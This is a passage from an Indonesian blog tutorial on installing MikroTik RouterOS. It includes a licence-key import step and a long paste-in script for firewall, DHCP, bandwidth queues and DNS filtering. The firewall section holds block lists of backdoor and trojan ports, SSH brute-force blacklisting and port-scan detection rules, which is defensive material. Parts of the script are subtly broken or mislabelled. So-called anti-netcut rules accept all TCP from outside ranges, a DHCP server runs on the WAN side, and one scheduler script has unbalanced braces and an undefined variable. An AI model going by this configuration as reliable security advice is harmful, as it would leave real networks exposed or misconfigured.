  7. Sekarang Import licence key ke MikroTik yang sudah dinstal tadi.
  8. Pada WinBox : System ----> Lincense ------> Import Key Cari file W5EY-LHT9.key lalu "Ok" dan restart mikrotik 
  9. Selesai. 
INSTALL MIKROTIK OS dengan FLASHDISK
Khusus bagi yang males menggunakan CD sebagai bootable, anda bisa menggunakan flashdisk sebagai installer, PC yang dipersyaratkan hanya yang bisa booting dari USB disk. 

  1. Download file-file mikrotik yang anda butuhkan diatas dan extract. 
  2. Download juga file Unetbootin
  3. Klik 2 kali file Unetbootin yang sudah selesai di download lalu pilih Opsi "Disk Image" 
  4. Klik Open dan Cari file extrakan mikrotik, Terus cari Type, pilih USB Drive, kemudian pilih Drive posisi flashdisk anda, dan klik OK. 
  5. setelah selesai, gunakan flashdisk untuk booting komputer dengan mode bios first boot USB disk, lakukan tahapan yang sama seperti tutorial diatas layaknya menggunakan CD. 


SETTING MIKROTIK
Berikan sedikit command setting untuk firewall, pengaturan Gateway, DHCP_server, Filter Rules anti virus, anti DDOS, anti netcut dan anti porno, Penggunakan mangle dan Queue tree, tutorial ini langsung saya arahkan untuk menangani bandwidth limiter dengan pola pcq-download dan upload. 

# Mikrotik RouterOS version 5.18
# scripting by jinho.diaz
# pastikan PC yang diaktifkan memiliki 2 buah lancard
# Lancard pertama sebagai ether1-gateway out interface 192.168.1.0/24 dengan gateway 192.168.1.254 mengarah ke modem
# Lancard kedua sebagai ether2-local-master in interface 192.168.2.0/24 dengan gateway 192.168.2.254 mengarah ke LAN
# script ini memuat anti netcut, DDOS, anti situs porno dan anti virus
# khusus anti porno dapat anda nonaktifkan dengan mengganti dns nawala dengan open DNS lain dari menu IP - DNS pada winbox
# Script ini Khusus untuk PC, tidak dianjurkan di terapkan pada Routerboard dengan spesifikasi rendah ( < 800 mhz)
# copy paste seluruh script dibawah ini ke new terminal pada winbox 

/interface ethernet
set 0 arp=enabled auto-negotiation=yes cable-settings=default \
    disable-running-check=yes disabled=no full-duplex=yes l2mtu=16383 \
    mtu=1500 name=ether1-gateway speed=100Mbps
set 1 arp=reply-only auto-negotiation=yes cable-settings=default \
    disable-running-check=yes disabled=no full-duplex=yes \
    mtu=1500 name=ether2-local-master speed=100Mbps

/ip firewall layer7-protocol
add name=download regexp="\\.(exe|rar|zip|7z|cab|asf|pdf|wav|mp3|ram|msu|msi|n\
    up|vdf|rmvb|daa|iso|nrg|bin|vcd|mp2|qt|raw|ogg|doc|xls|ppt|xlxs|mov|wmv|mp\
    g|mpeg|mkv|avi|flv|rm|mp4|dat|3gp|mpe|wma|docx|pptx|deb|flv2|tar|bzip|gzip\
    |gzip2).*\$"
add name=google regexp="google.com|google.co.id|yahoo.com|yahoo.co.id|yahoo|go\
    ogle|bing|msn|wordpress|blogspot|blogger|web.id|co.id|net.id|go.id|hotmail\
    |twitter"
add name=youtube regexp=o-o|youtube.com|webm
add name=http-video regexp="mivo.tv|mivotv|imediabiz|imedia|porn|video|stream|\
    movie|live|0\\.9|.tv|.0|video|mov|wmv|mpg|mpeg|mkv|avi|flv|rm|mp4|dat|3gp|\
    mpe|wma|xhamster|xnxx|fuck|flv2"

/ip pool
add name=default-dhcp ranges=192.168.1.1-192.168.1.253
add name=dhcp_pool1 ranges=192.168.1.1-192.168.1.253
add name=dhcp_pool2 ranges=192.168.1.1-192.168.1.253
add name=dhcp_pool3 ranges=192.168.2.1-192.168.2.253

/ip dhcp-server
add add-arp=yes address-pool=dhcp_pool1 authoritative=after-2sec-delay \
    bootp-support=static disabled=no interface=ether1-gateway lease-time=3d \
    name=dhcp1
add add-arp=yes address-pool=dhcp_pool3 authoritative=after-2sec-delay \
    bootp-support=static disabled=no interface=ether2-local-master \
    lease-time=3d name=dhcp_server

/queue tree
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=1M name=3.DOWNLOAD packet-mark="" parent=global-in priority=8
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=3.1.Limited packet-mark=users parent=3.DOWNLOAD \
    priority=8
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=1.BROWSING packet-mark="" parent=global-out priority=3
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=786k name=6.TUBE-TV packet-mark=users parent=global-out \
    priority=8
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=2.KONEKSI packet-mark="" parent=global-total priority=1
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=786k name="4.LIVE VIDEO" packet-mark="" parent=global-in \
    priority=8
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=1M name=5.GAME packet-mark="" parent=global-out priority=2
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=786k name=7.Chat packet-mark=users parent=global-in priority=8

/queue type
set 0 kind=pfifo name=default pfifo-limit=50
set 1 kind=pfifo name=ethernet-default pfifo-limit=50
set 2 kind=sfq name=wireless-default sfq-allot=1514 sfq-perturb=5
set 3 kind=red name=synchronous-default red-avg-packet=1000 red-burst=20 \
    red-limit=60 red-max-threshold=50 red-min-threshold=10
set 4 kind=sfq name=hotspot-default sfq-allot=1514 sfq-perturb=5
add kind=pcq name=PCQ_download pcq-burst-rate=0 pcq-burst-threshold=0 \
    pcq-burst-time=10s pcq-classifier=dst-address pcq-dst-address-mask=32 \
    pcq-dst-address6-mask=128 pcq-limit=50 pcq-rate=0 pcq-src-address-mask=32 \
    pcq-src-address6-mask=128 pcq-total-limit=2000
add kind=pcq name=PCQ_upload pcq-burst-rate=0 pcq-burst-threshold=0 \
    pcq-burst-time=10s pcq-classifier=src-address pcq-dst-address-mask=32 \
    pcq-dst-address6-mask=128 pcq-limit=50 pcq-rate=0 pcq-src-address-mask=32 \
    pcq-src-address6-mask=128 pcq-total-limit=2000
add kind=pcq name=pcq-download2 pcq-burst-rate=0 pcq-burst-threshold=0 \
    pcq-burst-time=10s pcq-classifier=dst-address pcq-dst-address-mask=32 \
    pcq-dst-address6-mask=128 pcq-limit=50 pcq-rate=0 pcq-src-address-mask=32 \
    pcq-src-address6-mask=128 pcq-total-limit=2000
add kind=pcq name=pcq-upload pcq-burst-rate=0 pcq-burst-threshold=0 \
    pcq-burst-time=10s pcq-classifier=src-address pcq-dst-address-mask=32 \
    pcq-dst-address6-mask=128 pcq-limit=50 pcq-rate=0 pcq-src-address-mask=32 \
    pcq-src-address6-mask=128 pcq-total-limit=2000
add kind=pfifo name=PING pfifo-limit=64
add kind=pcq name=DOWN pcq-burst-rate=0 pcq-burst-threshold=0 pcq-burst-time=\
    10s pcq-classifier=dst-address,dst-port pcq-dst-address-mask=32 \
    pcq-dst-address6-mask=128 pcq-limit=50 pcq-rate=0 pcq-src-address-mask=32 \
    pcq-src-address6-mask=128 pcq-total-limit=2000
set 11 kind=none name=only-hardware-queue
set 12 kind=mq-pfifo mq-pfifo-limit=50 name=multi-queue-ethernet-default
set 13 kind=pfifo name=default-small pfifo-limit=10

/queue tree
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=5.1.Game-Online packet-mark=online parent=5.GAME \
    priority=2 queue=default
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name="5.2.Game FB" packet-mark=gamefb parent=5.GAME priority=\
    2 queue=default
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=3.1.2.Hit packet-mark=hit parent=3.1.Limited priority=8 \
    queue=default
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=3.1.1.IDM packet-mark=idm parent=3.1.Limited priority=8 \
    queue=default
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=4.1.youtube packet-mark=stream-idm parent="4.LIVE VIDEO" \
    priority=8 queue=DOWN
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name="1.1.http brows" packet-mark=google parent=1.BROWSING \
    priority=3 queue=pcq-upload
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=2.1.ping-out packet-mark="paket ip" parent=2.KONEKSI \
    priority=1 queue=PING
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=2.2.ping-in packet-mark="paket dp" parent=2.KONEKSI \
    priority=1 queue=PING
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name="6.1.Tube Stream" packet-mark=users parent=6.TUBE-TV \
    priority=8 queue=pcq-download2
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name=6.2.Mivo.TV packet-mark=paket-mtc parent=6.TUBE-TV \
    priority=8 queue=pcq-upload
add burst-limit=0 burst-threshold=0 burst-time=0s disabled=no limit-at=0 \
    max-limit=0 name="7.1. Camfrog" packet-mark=camfrog parent=7.Chat \
    priority=8 queue=pcq-upload

/interface bridge settings
set use-ip-firewall=yes use-ip-firewall-for-pppoe=no \
    use-ip-firewall-for-vlan=no

/ip address
add address=192.168.1.1/24 comment="default configuration" disabled=no \
    interface=ether1-gateway network=192.168.1.0
add address=192.168.2.254/24 comment="default configuration" disabled=no \
    interface=ether2-local-master network=192.168.2.0

/ip dhcp-client
add add-default-route=yes comment="default configuration" \
    default-route-distance=1 disabled=no interface=ether1-gateway \
    use-peer-dns=yes use-peer-ntp=yes

/ip dhcp-server config
set store-leases-disk=5m

/ip dhcp-server network
add address=192.168.1.0/24 dhcp-option="" dns-server="" gateway=192.168.1.254 \
    ntp-server="" wins-server=""
add address=192.168.2.0/24 comment="default configuration" dhcp-option="" \
    dns-server="" gateway=192.168.2.254 ntp-server="" wins-server=""

/ip dns
set allow-remote-requests=yes cache-max-ttl=1w cache-size=2048KiB \
    max-udp-packet-size=512 servers=180.131.144.144,180.131.145.145

/ip dns static
add address=180.131.144.144 disabled=no name=router ttl=1d

/ip firewall connection tracking
set enabled=yes generic-timeout=10m icmp-timeout=10s tcp-close-timeout=10s \
    tcp-close-wait-timeout=10s tcp-established-timeout=1d \
    tcp-fin-wait-timeout=10s tcp-last-ack-timeout=10s \
    tcp-syn-received-timeout=5s tcp-syn-sent-timeout=5s tcp-syncookie=no \
    tcp-time-wait-timeout=10s udp-stream-timeout=3m udp-timeout=10s

/ip firewall filter
add action=drop chain=input comment=\
    "ANTI BRUTE FORCE - block ssh brute forcers" disabled=no dst-port=22 \
    protocol=tcp src-address-list=ssh_blacklist
add action=add-src-to-address-list address-list=ssh_blacklist \
    address-list-timeout=1w3d chain=input comment=\
    "add ssh brute forcers ip to blacklist" connection-state=new disabled=no \
    dst-port=22 protocol=tcp src-address-list=ssh_stage3
add action=add-src-to-address-list address-list=ssh_stage3 \
    address-list-timeout=1m chain=input comment=\
    "add ssh brute forcers ip to stage3" connection-state=new disabled=no \
    dst-port=22 protocol=tcp src-address-list=ssh_stage2
add action=add-src-to-address-list address-list=ssh_stage2 \
    address-list-timeout=1m chain=input comment=\
    "add ssh brute forcers ip to stage2" connection-state=new disabled=no \
    dst-port=22 protocol=tcp src-address-list=ssh_stage1
add action=add-src-to-address-list address-list=ssh_stage1 \
    address-list-timeout=1m chain=input comment=\
    "add ssh brute forcers ip to stage1" connection-state=new disabled=no \
    dst-port=22 protocol=tcp
add action=drop chain=forward comment="drop ssh brute downstream" disabled=no \
    dst-port=22 protocol=tcp src-address-list=ssh_blacklist 
/ip firewall filter
add action=accept chain=input comment=\
    "Virus Scan, DDOS & anti Netcut, jangan di non aktifkan" \
    disabled=no dst-port=8291 protocol=tcp
add action=drop chain=forward connection-state=invalid disabled=no
add action=drop chain=virus disabled=no dst-port=135-139 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1433-1434 protocol=tcp
add action=drop chain=virus disabled=no dst-port=445 protocol=tcp
add action=drop chain=virus disabled=no dst-port=445 protocol=udp
add action=drop chain=virus disabled=no dst-port=593 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1024-1030 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1080 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1214 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1363 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1364 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1368 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1373 protocol=tcp
add action=drop chain=virus disabled=no dst-port=1377 protocol=tcp
add action=drop chain=virus disabled=no dst-port=2745 protocol=tcp
add action=drop chain=virus disabled=no dst-port=2283 protocol=tcp
add action=drop chain=virus disabled=no dst-port=2535 protocol=tcp
add action=drop chain=virus disabled=no dst-port=2745 protocol=tcp
add action=drop chain=virus disabled=no dst-port=3127 protocol=tcp
add action=drop chain=virus disabled=no dst-port=3410 protocol=tcp
add action=drop chain=virus disabled=no dst-port=4444 protocol=tcp
add action=drop chain=virus disabled=no dst-port=4444 protocol=udp
add action=drop chain=virus disabled=no dst-port=5554 protocol=tcp
add action=drop chain=virus disabled=no dst-port=8866 protocol=tcp
add action=drop chain=virus disabled=no dst-port=9898 protocol=tcp
add action=drop chain=virus disabled=no dst-port=10080 protocol=tcp
add action=drop chain=virus disabled=no dst-port=12345 protocol=tcp
add action=drop chain=virus disabled=no dst-port=17300 protocol=tcp
add action=drop chain=virus disabled=no dst-port=27374 protocol=tcp
add action=drop chain=virus disabled=no dst-port=65506 protocol=tcp
add action=jump chain=forward disabled=no jump-target=virus
add action=drop chain=input connection-state=invalid disabled=no
add action=accept chain=input disabled=no protocol=udp
add action=accept chain=input disabled=no limit=50/5s,2 protocol=icmp
add action=drop chain=input disabled=no protocol=icmp
add action=accept chain=input disabled=no dst-port=21 protocol=tcp
add action=accept chain=input disabled=no dst-port=22 protocol=tcp
add action=accept chain=input disabled=no dst-port=23 protocol=tcp
add action=accept chain=input disabled=no dst-port=80 protocol=tcp
add action=accept chain=input disabled=no dst-port=8291 protocol=tcp
add action=accept chain=input disabled=no dst-port=1723 protocol=tcp
add action=accept chain=input disabled=no dst-port=23 protocol=tcp
add action=accept chain=input disabled=no dst-port=80 protocol=tcp
add action=accept chain=input disabled=no dst-port=1723 protocol=tcp
add action=add-src-to-address-list address-list=DDOS address-list-timeout=15s \
    chain=input disabled=no dst-port=1337 protocol=tcp
add action=add-src-to-address-list address-list=DDOS address-list-timeout=15m \
    chain=input disabled=no dst-port=7331 protocol=tcp src-address-list=knock
add action=add-src-to-address-list address-list=port-scanners \
    address-list-timeout=2w chain=input comment=port-scanner disabled=no \
    protocol=tcp psd=21,3s,3,1
add action=add-src-to-address-list address-list=port-scanners \
    address-list-timeout=2w chain=input comment=SYN/FIN disabled=no protocol=\
    tcp tcp-flags=fin,syn
add action=add-src-to-address-list address-list=port-scanners \
    address-list-timeout=2w chain=input comment=SYN/RST disabled=no protocol=\
    tcp tcp-flags=syn,rst
add action=add-src-to-address-list address-list=port-scanners \
    address-list-timeout=2w chain=input comment=FIN/PSH/URG disabled=no \
    protocol=tcp tcp-flags=fin,psh,urg,!syn,!rst,!ack
add action=add-src-to-address-list address-list=port-scanners \
    address-list-timeout=2w chain=input comment="ALL/ALL scan" disabled=no \
    protocol=tcp tcp-flags=fin,syn,rst,psh,ack,urg
add action=add-src-to-address-list address-list=port-scanners \
    address-list-timeout=2w chain=input comment=NMAP disabled=no protocol=tcp \
    tcp-flags=!fin,!syn,!rst,!psh,!ack,!urg
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=61.213.183.1-61.213.183.254
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=67.195.134.1-67.195.134.254
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=68.142.233.1-68.142.233.254
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=68.180.217.1-68.180.217.254
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=203.84.204.1-203.84.204.254
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=69.63.176.1-69.63.176.254
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=69.63.181.1-69.63.181.254
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=63.245.209.1-63.245.209.254
add action=accept chain=input comment=ANTI-NETCUT disabled=no dst-port=\
    0-65535 protocol=tcp src-address=63.245.213.1-63.245.213.254

/ip firewall mangle
add action=mark-packet chain=postrouting comment=HIT disabled=no dscp=12 \
    new-packet-mark=hit passthrough=no
add action=mark-packet chain=postrouting content=X-Cache:HIT disabled=no \
    new-packet-mark=hit passthrough=no
add action=mark-connection chain=prerouting comment=GAME disabled=no \
    dst-port=1818,2001,3010,4300,5105,5121,5126,5171,5340-5352,6000-6152,7777 \
    new-connection-mark=GAMEONLINE passthrough=yes protocol=tcp
add action=mark-connection chain=prerouting disabled=no dst-port=\
    7341-7350,7451,8085,9600,9601-9602,9300,9376-9377,9400,9700,10001-10011 \
    new-connection-mark=GAMEONLINE passthrough=yes protocol=tcp
add action=mark-connection chain=prerouting disabled=no dst-port="10402,11011-\
    11041,12011,12110,13008,13413,15000-15002,16402-16502,16666,18901-18909,19\
    000" new-connection-mark=GAMEONLINE passthrough=yes protocol=tcp
add action=mark-connection chain=prerouting disabled=no dst-port=\
    19101,22100,27780,28012,29000,29200,39100,39110,39220,39190,40000,49100 \
    new-connection-mark=GAMEONLINE passthrough=yes protocol=tcp
add action=mark-connection chain=prerouting disabled=no dst-port=14009-14010 \
    new-connection-mark=GAMEONLINE passthrough=yes protocol=tcp
add action=mark-connection chain=prerouting disabled=no dst-port=14009-14010 \
    new-connection-mark=GAMEONLINE passthrough=yes protocol=udp
add action=mark-connection chain=prerouting disabled=no dst-port="1293,1479,61\
    00-6152,7777-7977,8001,9401,9600-9602,12020-12080,30000,40000-40010" \
    new-connection-mark=GAMEONLINE passthrough=yes protocol=udp
add action=mark-connection chain=prerouting disabled=no dst-port=\
    42051-42052,11100-11125,11440-11460 new-connection-mark=GAMEONLINE \
    passthrough=yes protocol=udp
add action=mark-packet chain=prerouting connection-mark=GAMEONLINE disabled=\
    no new-packet-mark=online passthrough=no
add action=mark-connection chain=prerouting content=facebook.com disabled=no \
    new-connection-mark=fb_game passthrough=yes
add action=mark-connection chain=prerouting content=fbcdn.net disabled=no \
    new-connection-mark=fb_game passthrough=yes
add action=mark-connection chain=prerouting content=facebook.net disabled=no \
    new-connection-mark=fb_game passthrough=yes
add action=mark-connection chain=prerouting content=zynga.com disabled=no \
    new-connection-mark=fb_game passthrough=yes
add action=mark-connection chain=prerouting content=\
    static.ak.connect.facebook.com disabled=no new-connection-mark=fb_game \
    passthrough=yes
add action=mark-connection chain=prerouting content=\
    statics.poker.static.zynga.com disabled=no new-connection-mark=fb_game \
    passthrough=yes
add action=mark-connection chain=prerouting disabled=no dst-port=9339,843 \
    new-connection-mark=fb_game passthrough=yes protocol=tcp
add action=mark-packet chain=prerouting connection-mark=fb_game disabled=no \
    new-packet-mark=gamefb passthrough=no
add action=mark-connection chain=prerouting disabled=no new-connection-mark=\
    users-con passthrough=yes src-address=!192.168.2.254 src-address-list=!IP
add action=mark-packet chain=prerouting connection-mark=users-con disabled=no \
    new-packet-mark=users passthrough=yes
add action=mark-connection chain=prerouting comment=IDM disabled=no \
    layer7-protocol=download new-connection-mark=idm passthrough=yes \
    src-address=!192.168.2.254 src-address-list=!IP
add action=mark-packet chain=prerouting connection-mark=idm disabled=no \
    new-packet-mark=idm passthrough=no
add action=mark-connection chain=prerouting comment=Browsing disabled=no \
    layer7-protocol=google new-connection-mark=google passthrough=yes \
    src-address=!192.168.2.254 src-address-list=!IP
add action=mark-packet chain=forward connection-mark=google disabled=no \
    new-packet-mark=google passthrough=no src-address=!192.168.2.254
add action=mark-connection chain=prerouting disabled=no layer7-protocol=\
    youtube new-connection-mark=stream-idm passthrough=yes src-address=\
    !192.168.2.254 src-address-list=!IP
add action=mark-packet chain=prerouting connection-mark=stream-idm disabled=\
    no new-packet-mark=stream-idm passthrough=no
add action=mark-connection chain=prerouting comment=ICMP disabled=no \
    new-connection-mark="paket ic" passthrough=yes protocol=icmp
add action=mark-packet chain=prerouting connection-mark="paket ic" disabled=\
    no new-packet-mark="paket ip" passthrough=yes
add action=change-dscp chain=prerouting disabled=no new-dscp=1 packet-mark=\
    "paket ip" passthrough=yes
add action=mark-connection chain=prerouting comment=DNS disabled=no dst-port=\
    53 new-connection-mark="paket dc" passthrough=yes protocol=tcp
add action=mark-connection chain=prerouting disabled=no dst-port=53 \
    new-connection-mark="paket dc" passthrough=yes protocol=udp
add action=mark-packet chain=prerouting connection-mark="paket dc" disabled=\
    no new-packet-mark="paket dp" passthrough=yes
add action=change-dscp chain=prerouting disabled=no new-dscp=1 packet-mark=\
    "paket dp" passthrough=yes
add action=mark-connection chain=prerouting comment="MIVO TV" disabled=no \
    layer7-protocol=http-video new-connection-mark=paket-mtc passthrough=yes \
    src-address=!192.168.2.254 src-address-list=!IP
add action=mark-packet chain=forward connection-mark=paket-mtc disabled=no \
    new-packet-mark=paket-mtc passthrough=no
add action=mark-connection chain=prerouting comment=Camfrog disabled=no \
    dst-port=2779,6667 new-connection-mark=camfrog passthrough=yes protocol=\
    tcp
add action=mark-packet chain=prerouting connection-mark=camfrog disabled=no \
    new-packet-mark=camfrog passthrough=no

/ip firewall nat
add action=masquerade chain=srcnat comment="default configuration" disabled=\
    no out-interface=ether1-gateway src-address=192.168.2.0/24
add action=redirect chain=dstnat comment=\
    "Redirect ke Port 53 untuk nawala anti porno project" disabled=no \
    dst-port=53 protocol=tcp src-address=192.168.2.0/24 to-ports=53
add action=redirect chain=dstnat disabled=no dst-port=53 protocol=udp \
    src-address=192.168.2.0/24 to-ports=53
add action=redirect chain=dstnat comment="Redirect To Proxy, aktifkan error.ht\
    ml - non aktifkan dulu redirect ke port 53" disabled=yes dst-port=80 \
    protocol=tcp to-ports=8080
add action=redirect chain=dstnat disabled=yes dst-port=3128 protocol=tcp \
    to-ports=8080
add action=redirect chain=dstnat disabled=yes dst-port=8080 protocol=tcp \
    to-addresses=0.0.0.0 to-ports=8080

/ip proxy
set always-from-cache=no cache-administrator=webmaster cache-hit-dscp=4 \
    cache-on-disk=no enabled=yes max-cache-size=none max-client-connections=\
    600 max-fresh-time=3d max-server-connections=600 parent-proxy=0.0.0.0 \
    parent-proxy-port=0 port=8080 serialize-connections=no src-address=\
    192.168.2.254

/ip route
add disabled=no distance=1 dst-address=0.0.0.0/0 gateway=192.168.1.254 scope=\
    30 target-scope=10

/ip service
set telnet address="" disabled=yes port=23
set ftp address="" disabled=yes port=21
set www address="" disabled=yes port=80
set ssh address="" disabled=yes port=22
set www-ssl address="" certificate=none disabled=yes port=443
set api address="" disabled=yes port=8728
set winbox address="" disabled=no port=8291

/queue interface
set ether1-gateway queue=ethernet-default
set ether2-local-master queue=ethernet-default

/system clock
set time-zone-name=manual

/system clock manual
set dst-delta=+00:00 dst-end="jan/01/1970 00:00:00" dst-start=\
    "jan/01/1970 00:00:00" time-zone=+00:00

/system identity
set name=mikrotik

/system note
set note=Input.command.by.jinho.diaz show-at-login=yes

/system ntp client
set enabled=yes mode=unicast primary-ntp=207.46.197.32 secondary-ntp=\
    192.43.244.18

/system ntp server
set broadcast=no broadcast-addresses="" enabled=no manycast=yes multicast=no


/system scheduler
add disabled=no interval=20m name="cache flush" on-event=cacheflush policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive \
    start-date=aug/16/2012 start-time=12:05:00
add disabled=no interval=1d name=schedule1 on-event=dnschange policy=\
    reboot,read,write,policy,test,password,sniff,sensitive start-date=\
    aug/16/2012 start-time=04:55:00
add disabled=no interval=1d name=antinetcut1 on-event=antinetcut1 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=oct/07/2012 start-time=04:03:40
add disabled=no interval=1d name=antinetcut2 on-event=antinetcut2 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    start-date=oct/07/2012 start-time=04:04:46

/system script
add name=cacheflush policy=ftp,reboot,read,write,policy,test,winbox,password \
    source="/ip dns cache flush"
add name=dnschange policy=ftp,reboot,read,write,policy,test,winbox,password \
    source="/ip dns set servers=180.131.144.144,180.131.145.145 allow-remote-r\
    equests=yes"
add name=antinetcut1 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source=":local hosts [/ip dhcp-server lease find]\r\
    \n:local pcname \"X\"\r\
    \n:local pcnum 0\r\
    \n:global hacklist \"\"\r\
    \n:foreach h in \$hosts do={\r\
    \n:local host [/ip dhcp-server lease get \$h host-name]\r\
    \n:if ([:len \$host] >0) do {\r\
    \n:set pcname (\$pcname . \",\" . \$host)\r\
    \n:set pcnum (\$pcnum + 1)\r\
    \n}\r\
    \n}\r\
    \n:foreach h in \$pcname do={\r\
    \n:local hh 0\r\
    \n:if (!([:find \$hacklist \$h]>=0)) do={\r\
    \n:foreach k in \$pcname do={ :if (\$k=\$h) do={:set hh (\$hh + 1) } }\r\
    \n:if (\$hh>2) do={\r\
    \n:if ([:len \$hacklist] >0) do {:set hacklist (\$hacklist . \",\" . \$h)}\
    \_else={:set hacklist \$h}\r\
    \n}\r\
    \n}\r\
    \n}\r\
    \n:local timer [:pick [/system clock get time] 3 5]\r\
    \n:if ((\$switch > 0) || (\$timer >= \"58\")) do={\r\
    \n:log warning (\"New Hacklist: \" . \$hacklist)"
add name=antinetcut2 policy=\
    ftp,reboot,read,write,policy,test,winbox,password,sniff,sensitive,api \
    source="# use global hacklist variable\r\
    \n#:log info (\$hacklist)\r\
    \n:foreach host in \$hacklist do={\r\
    \n:foreach i in= [/ip dhcp-server lease find host-name \$host] do={\r\
    \n:local ipnum [/ip dhcp-server lease get \$i address]\r\
    \n:local unum [/ip hotspot active find address \$ipnum]\r\
    \n:if ([:len \$unum] >0) do {\r\
    \n:local usr [/ip hotspot active get \$unum user]\r\
    \n:log warning (\$host . \" \" . \$ipnum . \" \" . \$usr)\r\
    \n#next line kick them out right now, could also check pppoe\r\
    \n/ip hotspot active remove \$unum\r\
    \n#other stuff can do now with the identified IP and USER\r\
    \n}\r\
    \n}\r\
    \n}"

/system watchdog
set auto-send-supout=no automatic-supout=yes no-ping-delay=5m watch-address=\
    none watchdog-timer=no


sumber:
http://rumah-it01.blogspot.com/2013/06/tutorial-setting-mikrotik-lengkap.html